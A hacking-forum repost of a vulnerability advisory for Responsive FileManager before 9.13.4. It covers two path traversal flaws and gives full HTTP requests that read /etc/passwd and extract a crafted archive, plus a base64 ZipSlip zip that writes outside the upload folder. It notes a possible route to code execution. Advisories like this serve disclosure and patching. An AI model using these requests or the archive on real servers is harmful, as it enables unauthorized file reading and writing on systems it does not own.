跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Responsive FileManager < 9.13.4 - Directory Traversal

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
The following vulnerabilities were fixed in the version 9.13.4.
https://responsivefilemanager.com

#1 Path Traversal Allows to Read Any File

Reserved CVE: CVE-2018-15535
Discovered By: Simon Uvarov
Vendor Status: Fixed

Details:

The following request allows a user to read any file on the system.

    GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1
    Host: 192.168.5.129
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.129/filemanager/dialog.php?type=0&popup=1
    X-Requested-With: XMLHttpRequest
    Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
    Connection: close

#2 Path Traversal While Upacking Archives

Reserved CVE: CVE-2018-15536
Discovered By: Simon Uvarov
Vendor Status: Fixed

The following request starts unpacking the exploit.zip archive:

    POST /filemanager/ajax_calls.php?action=extract HTTP/1.1
    Host: 192.168.5.129
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.129/filemanager/dialog.php?type=0&lang=en_EN&popup=1&crossdomain=0&relative_url=0&akey=key&fldr=&5b6d9b91535a9&1533909952983
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 16
    Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
    Connection: close
   
    path=exploit.zip

Bases64-encoded example of exploit.zip which creates source.txt in /tmp/ directory:

    UEsDBBQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdG1w
    L3NvdXJjZS50eHR1cGxvYWRzIGZvbGRlclBLAQIUAxQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAA
    AAAAAAAAAADtgQAAAAAuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi90bXAvc291cmNlLnR4dFBLBQYA
    AAAAAQABAFQAAABSAAAAAAA=

It is possible to create archives containing ../../ as a part of a file path, now it's famous as ZipSlip vulnerability, but it's an old bug.

It is impossible to upload .php files or .htaccess file using this method, but itas possible to create different files with "legal" extensions on a system and it may lead to remote code execution if a server runs with enough privileges, for example, to create cron jobs.

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。